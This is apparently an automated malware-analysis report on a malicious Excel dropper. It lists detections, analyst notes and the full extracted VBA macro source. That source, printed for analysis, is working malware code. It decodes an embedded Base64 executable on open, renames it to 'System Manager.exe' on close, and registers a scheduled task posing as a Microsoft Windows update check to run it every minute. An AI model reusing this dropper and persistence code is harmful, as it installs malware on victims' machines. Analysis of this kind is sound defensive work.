Verdict: MALICIOUS (Risk Score: 246)

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
- T1105 Ingress Tool Transfer

Summary:
The file is identified as a malicious Excel dropper by ClamAV. It contains Workbook_Open and Auto_Open VBA macros designed to execute upon opening. The macro attempts to create a file named 'System Manager.exe' in the user's profile directory, suggesting it downloads and executes a second-stage payload.
Heuristics (10 findings)

- ClamAV: Xls.Dropper.Agent-7062746-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Xls.Dropper.Agent-7062746-0.
- Heap-spray pattern detected (high, SC_HEAP_SPRAY): Repeated 0x41 ('A') bytes found.
  Disassembly (attempted x86 opcode disassembly):
    00017C37 41 inc ecx
    00017C38 41 inc ecx
    00017C39 41 inc ecx
    ... (the same single-byte instruction, 41 inc ecx, at every offset through 00017C96; 96 instructions in total)
  Analyst note: 0x41 is ASCII 'A', the Base64 digit that encodes six zero bits, and the extracted macro source below decodes a Base64 blob stored in a UserForm label caption (uf.Lb.Caption) and writes it to disk. A long run of 'A' characters is exactly what Base64 encoding of zero-filled data produces, so this hit is consistent with encoded payload text rather than with a heap spray.
- VBA macros detected (medium, OLE_VBA_MACROS, 5 related findings): Document contains VBA macro code.
- CreateObject call (high, OLE_VBA_CREATEOBJ). Matched lines in script:
    fn_f = "System." & "d" & "oc"
    Set fso = CreateObject("Scripting.FileSystemObject")
    If Not fso.FileExists(fp & "\" & fn) Then
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Workbook_Open macro (low, OLE_VBA_WBOPEN). Matched lines in script:
    Attribute VB_Customizable = True
    Private Sub Workbook_open()
    Start
- Auto_Open macro (low, OLE_VBA_AUTO). Matched lines in script:
    Attribute VB_Name = "Module1"
    Sub Auto_Open()
    'MsgBox "salam"
- Environ() call (env variable access) (low, OLE_VBA_ENVIRON). Matched lines in script:
    If Application.MouseAvailable Then
    fp = "C:\Users\" & Environ("us" & "ername") & "\.template"
    eeee = "e" & "x"
- NOP-equivalent sled detected (medium, SC_NOP_EQUIV_SLED): Long run of 0x41 bytes.
  Disassembly (attempted x86 opcode disassembly):
    0001782D 41 inc ecx
    0001782E 41 inc ecx
    0001782F 41 inc ecx
    ... (41 inc ecx at every offset through 0001785B; 47 instructions in total)
    0001785C 45 inc ebp
    0001785D 41 inc ecx
    0001785E 45 inc ebp
    0001785F 41 inc ecx
    00017860 41 inc ecx
    00017861 41 inc ecx
    00017862 3466 xor al, 0x66
    00017864 7567 jne 0x178cd
    00017866 3441 xor al, 0x41
    00017868 7441 je 0x178ab
    0001786A 6e outsb dx, byte ptr [esi]
    0001786B 4e dec esi
    0001786C 49 dec ecx
    0001786D 626742 bound esp, qword ptr [edi + 0x42]
    00017870 54 push esp
    00017871 4d dec ebp
    00017872 306856 xor byte ptr [eax + 0x56], ch
    00017875 47 inc edi
    00017876 6870637942 push 0x42796370
    0001787B 7763 ja 0x178e0
    0001787D 6d insd dword ptr es:[edi], dx
    0001787E 396e63 cmp dword ptr [esi + 0x63], ebp
    00017881 6d insd dword ptr es:[edi], dx
    00017882 46 inc esi
    00017883 7449 je 0x178ce
    00017885 47 inc edi
    00017886 4e dec esi
    00017887 68626d3576 push 0x76356d62
    0001788C 64 .byte 0x64
  Analyst note: read as ASCII, the bytes from 00017862 onward are the printable string "4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vd", and "VGhpcyBwcm9ncmFtIGNhbm5vd" is the Base64 encoding of "This program cannot", the beginning of the DOS-stub message present in every PE executable. The "sled" is therefore the Base64 text of an embedded Windows executable, which matches the macro's decode-and-write logic; it is not executable shellcode. The disassembler is reading text, so these mnemonics carry no meaning.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://www.eclipse.org/legal (in document text, OLE body)
  - http://www.gnu.org/licenses/lgpl.html (in document text, OLE body)
  - http://www.gnu.org/licenses/gpl.html (in document text, OLE body)
  - http://www.gnu.org/licenses/agpl.html (in document text, OLE body)
  - http://www.apache.org/licenses (in document text, OLE body)
  - http://www.opensource.org/licenses/bsd-license.php (in document text, OLE body)
  - http://www.opensource.org/licenses/MIT (in document text, OLE body)
  Analyst note: all of these URLs appear in the license header of the third-party Base64 encoder/decoder module (Module3) bundled into the macro project; none is contacted by the macro code.
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 12682 bytes |

SHA-256 (macros.bas): 3b224391d11570ec01ec5f52c31c25481de5eaa77d8175882b89e0e039861bf4

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_open()
Start
End Sub
Private Sub Workbook_BeforeClose(Cancel As Boolean)
Start2
End Sub
Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Module1"
Sub Auto_Open()
'MsgBox "salam"
End Sub
Attribute VB_Name = "Module2"
Sub Start()
'Range("A1").Value = ""
'Range("B2").Value = "First Name:"
'you cant hide all sheets, at least one sheet must be visible
ActiveWorkbook.Sheets("Sheet1").Visible = xlSheetVisible
ActiveWorkbook.Sheets("Sheet1 ").Visible = xlSheetVeryHidden
ActiveWorkbook.Save
If Application.MouseAvailable Then
fp = "C:\Users\" & Environ("us" & "ername") & "\.template"
eeee = "e" & "x"
fn = "System Manager." & eeee & "e"
fn_f = "System." & "d" & "oc"
Set fso = CreateObject("Scripting.FileSystemObject")
If Not fso.FileExists(fp & "\" & fn) Then
If Dir(fp, vbDirectory) = "" Then
MkDir fp
End If
b64 = uf.Lb.Caption
'important defenition for exact write
Dim res() As Byte
res = Base64Decode(b64)
'MsgBox UBound(res) - LBound(res) + 1
Dim fileNo As Integer
fileNo = FreeFile
Open fp & "\" & fn_f For Binary Lock Read Write As #fileNo
Put #fileNo, 1, res
Close #fileNo
End If
End If
End Sub
Sub Start2()
If Application.MouseAvailable Then
Set fso = CreateObject("Scripting.FileSystemObject")
fp = "C:\Users\" & Environ("us" & "ername") & "\.template"
eeee = "e" & "x"
fn = "System Manager." & eeee & "e"
fn_f = "System." & "d" & "oc"
If fso.FileExists(fp & "\" & fn_f) And Not (fso.FileExists(fp & "\" & fn)) Then
Name fp & "\" & fn_f As fp & "\" & fn
End If
createTa
End If
End Sub
Sub createTa()
sb = "S"
sa = "edu"
sg = "ser"
sn = "v"
Set seri = CreateObject(sb & "ch" & sa & "le." & sg & sn & "ice")
Call seri.Connect
Dim rF
Set rF = seri.GetFolder("\")
Dim tD
Set tD = seri.NewTask(0)
Dim ri
Set ri = tD.RegistrationInfo
ri.Description = "Check win" & "dows upda" & "tes"
ri.Author = "Micr" & "osoft"
Dim pp
Set pp = tD.Principal
pp.LogonType = 3
' Set the task setting info for the Task Scheduler by
' creating a TaskSettings object.
With tD.settings
.Enabled = True
.runonlyifidle = False
.disallowstartifonbatteries = False
.multipleinstances = 0
.allowdemandstart = True
.StartWhenAvailable = True
.ExecutionTimeLimit = "P20D"
End With
Dim a
Set a = tD.triggers
Dim t
Set tr = a.Create(1)
tr.Enabled = True
tr.ID = "" & "counter" & ""
tr.StartBoundary = XT(DateAdd("h", 0, Now()))
With tr.Repetition
.Interval = "PT1M"
.StopAtDurationEnd = False
End With
fp = "C:\Users\" & Environ("us" & "ername") & "\.template"
eeee = "e" & "x"
fn = "System Manager." & eeee & "e"
fn_f = "System." & "d" & "oc"
Dim ac
Set ac = tD.Actions.Create(0)
ac.Path = fp & "\" & fn
Call rF.RegisterTaskDefinition("windo" & "ws update check", tD, 6, , , 3)
End Sub
Function XT(t)
Dim cS, cM, CH, cD, cMo, cY, tT, tD
cS = "0" & Second(t)
cM = "0" & Minute(t)
CH = "0" & Hour(t)
cD = "0" & Day(t)
cMo = "0" & Month(t)
cY = Year(t)
tT = Right(CH, 2) & ":" & Right(cM, 2) & _
":" & Right(cS, 2)
tD = cY & "-" & Right(cMo, 2) & "-" & Right(cD, 2)
XT = tD & "T" & tT
End Function
Sub Help()
Range("A1").Value = "hellooooo"
End Sub
Sub b64OfFile()
Dim byteArr() As Byte
Dim fileInt As Integer: fileInt = FreeFile
Open "C:\in.bin" For Binary Access Read As #fileInt
ReDim byteArr(0 To LOF(fileInt) - 1)
Get #fileInt, , byteArr
Close #fileInt
b64 = Base64Encode(byteArr)
Dim fso As Object
Set fso = CreateObject("Scripting.FileSystemObject")
Dim oFile As Object
Set oFile = fso.CreateTextFile("C:\out.txt")
oFile.WriteLine b64
oFile.Close
Set fso = Nothing
Set oFile = Nothing
End Sub
Attribute VB_Name = "uf"
Attribute VB_Base = "0{A1099C19-8DF9-484E-93BE-340A55FC02C1}{6DFD2376-698D-4F79-812D-4876E9466868}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub TextBox1_Change()
End Sub
Private Sub Lb_Click()
End Sub
Attribute VB_Name = "Module3"
' A Base64 Encoder/Decoder.
'
' This module is used to encode and decode data in Base64 format as described in RFC 1521.
'
' Home page: www.source-code.biz.
' Copyright 2007: Christian d'Heureuse, Inventec Informatik AG, Switzerland.
'
' This module is multi-licensed and may be used under the terms
' of any of the following licenses:
'
' EPL, Eclipse Public License, V1.0 or later, http://www.eclipse.org/legal
' LGPL, GNU Lesser General Public License, V2.1 or later, http://www.gnu.org/licenses/lgpl.html
' GPL, GNU General Public License, V2 or later, http://www.gnu.org/licenses/gpl.html
' AGPL, GNU Affero General Public License V3 or later, http://www.gnu.org/licenses/agpl.html
' AL, Apache License, V2.0 or later, http://www.apache.org/licenses
' BSD, BSD License, http://www.opensource.org/licenses/bsd-license.php
' MIT, MIT License, http://www.opensource.org/licenses/MIT
'
' Please contact the author if you need another license.
' This module is provided "as is", without warranties of any kind.
Option Explicit
Private InitDone As Boolean
Private Map1(0 To 63) As Byte
Private Map2(0 To 127) As Byte
' Encodes a string into Base64 format.
' No blanks or line breaks are inserted.
' Parameters:
' S a String to be encoded.
' Returns: a String with the Base64 encoded data.
Public Function Base64EncodeString(ByVal s As String) As String
Base64EncodeString = Base64Encode(ConvertStringToBytes(s))
End Function
' Encodes a byte array into Base64 format.
' No blanks or line breaks are inserted.
' Parameters:
' InData an array containing the data bytes to be encoded.
' Returns: a string with the Base64 encoded data.
Public Function Base64Encode(InData() As Byte)
Base64Encode = Base64Encode2(InData, UBound(InData) - LBound(InData) + 1)
End Function
' Encodes a byte array into Base64 format.
' No blanks or line breaks are inserted.
' Parameters:
' InData an array containing the data bytes to be encoded.
' InLen number of bytes to process in InData.
' Returns: a string with the Base64 encoded data.
Public Function Base64Encode2(InData() As Byte, ByVal InLen As Long) As String
If Not InitDone Then Init
If InLen = 0 Then Base64Encode2 = "": Exit Function
Dim ODataLen As Long: ODataLen = (InLen * 4 + 2) \ 3 ' output length without padding
Dim OLen As Long: OLen = ((InLen + 2) \ 3) * 4 ' output length including padding
Dim Out() As Byte
ReDim Out(0 To OLen - 1) As Byte
Dim ip0 As Long: ip0 = LBound(InData)
Dim ip As Long
Dim op As Long
Do While ip < InLen
Dim i0 As Byte: i0 = InData(ip0 + ip): ip = ip + 1
Dim i1 As Byte: If ip < InLen Then i1 = InData(ip0 + ip): ip = ip + 1 Else i1 = 0
Dim i2 As Byte: If ip < InLen Then i2 = InData(ip0 + ip): ip = ip + 1 Else i2 = 0
Dim o0 As Byte: o0 = i0 \ 4
Dim o1 As Byte: o1 = ((i0 And 3) * &H10) Or (i1 \ &H10)
Dim o2 As Byte: o2 = ((i1 And &HF) * 4) Or (i2 \ &H40)
Dim o3 As Byte: o3 = i2 And &H3F
Out(op) = Map1(o0): op = op + 1
Out(op) = Map1(o1): op = op + 1
Out(op) = IIf(op < ODataLen, Map1(o2), Asc("=")): op = op + 1
Out(op) = IIf(op < ODataLen, Map1(o3), Asc("=")): op = op + 1
Loop
Base64Encode2 = ConvertBytesToString(Out)
End Function
' Decodes a string from Base64 format.
' Parameters:
' s a Base64 String to be decoded.
' Returns a String containing the decoded data.
Public Function Base64DecodeString(ByVal s As String) As String
If s = "" Then Base64DecodeString = "": Exit Function
Base64DecodeString = ConvertBytesToString(Base64Decode(s))
End Function
' Decodes a byte array from Base64 format.
' Parameters
' s a Base64 String to be decoded.
' Returns: an array containing the decoded data bytes.
Public Function Base64Decode(ByVal s As String) As Byte()
If Not InitDone Then Init
Dim IBuf() As Byte: IBuf = ConvertStringToBytes(s)
Dim ILen As Long: ILen = UBound(IBuf) + 1
If ILen Mod 4 <> 0 Then Err.Raise vbObjectError, , "Length of Base64 encoded input string is not a multiple of 4."
Do While ILen > 0
If IBuf(ILen - 1) <> Asc("=") Then Exit Do
ILen = ILen - 1
Loop
Dim OLen As Long: OLen = (ILen * 3) \ 4
Dim Out() As Byte
ReDim Out(0 To OLen - 1) As Byte
Dim ip As Long
Dim op As Long
Do While ip < ILen
Dim i0 As Byte: i0 = IBuf(ip): ip = ip + 1
Dim i1 As Byte: i1 = IBuf(ip): ip = ip + 1
Dim i2 As Byte: If ip < ILen Then i2 = IBuf(ip): ip = ip + 1 Else i2 = Asc("A")
Dim i3 As Byte: If ip < ILen Then i3 = IBuf(ip): ip = ip + 1 Else i3 = Asc("A")
If i0 > 127 Or i1 > 127 Or i2 > 127 Or i3 > 127 Then _
Err.Raise vbObjectError, , "Illegal character in Base64 encoded data."
Dim b0 As Byte: b0 = Map2(i0)
Dim b1 As Byte: b1 = Map2(i1)
Dim b2 As Byte: b2 = Map2(i2)
Dim b3 As Byte: b3 = Map2(i3)
If b0 > 63 Or b1 > 63 Or b2 > 63 Or b3 > 63 Then _
Err.Raise vbObjectError, , "Illegal character in Base64 encoded data."
Dim o0 As Byte: o0 = (b0 * 4) Or (b1 \ &H10)
Dim o1 As Byte: o1 = ((b1 And &HF) * &H10) Or (b2 \ 4)
Dim o2 As Byte: o2 = ((b2 And 3) * &H40) Or b3
Out(op) = o0: op = op + 1
If op < OLen Then Out(op) = o1: op = op + 1
If op < OLen Then Out(op) = o2: op = op + 1
Loop
Base64Decode = Out
End Function
Private Sub Init()
Dim c As Integer, i As Integer
' set Map1
i = 0
For c = Asc("A") To Asc("Z"): Map1(i) = c: i = i + 1: Next
For c = Asc("a") To Asc("z"): Map1(i) = c: i = i + 1: Next
For c = Asc("0") To Asc("9"): Map1(i) = c: i = i + 1: Next
Map1(i) = Asc("+"): i = i + 1
Map1(i) = Asc("/"): i = i + 1
' set Map2
For i = 0 To 127: Map2(i) = 255: Next
For i = 0 To 63: Map2(Map1(i)) = i: Next
InitDone = True
End Sub
Private Function ConvertStringToBytes(ByVal s As String) As Byte()
Dim b1() As Byte: b1 = s
Dim l As Long: l = (UBound(b1) + 1) \ 2
If l = 0 Then ConvertStringToBytes = b1: Exit Function
Dim b2() As Byte
ReDim b2(0 To l - 1) As Byte
Dim p As Long
For p = 0 To l - 1
Dim c As Long: c = b1(2 * p) + 256 * CLng(b1(2 * p + 1))
If c >= 256 Then c = Asc("?")
b2(p) = c
Next
ConvertStringToBytes = b2
End Function
Private Function ConvertBytesToString(b() As Byte) As String
Dim l As Long: l = UBound(b) - LBound(b) + 1
Dim b2() As Byte
ReDim b2(0 To (2 * l) - 1) As Byte
Dim p0 As Long: p0 = LBound(b)
Dim p As Long
For p = 0 To l - 1: b2(2 * p) = b(p0 + p): Next
Dim s As String: s = b2
ConvertBytesToString = s
End Function
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True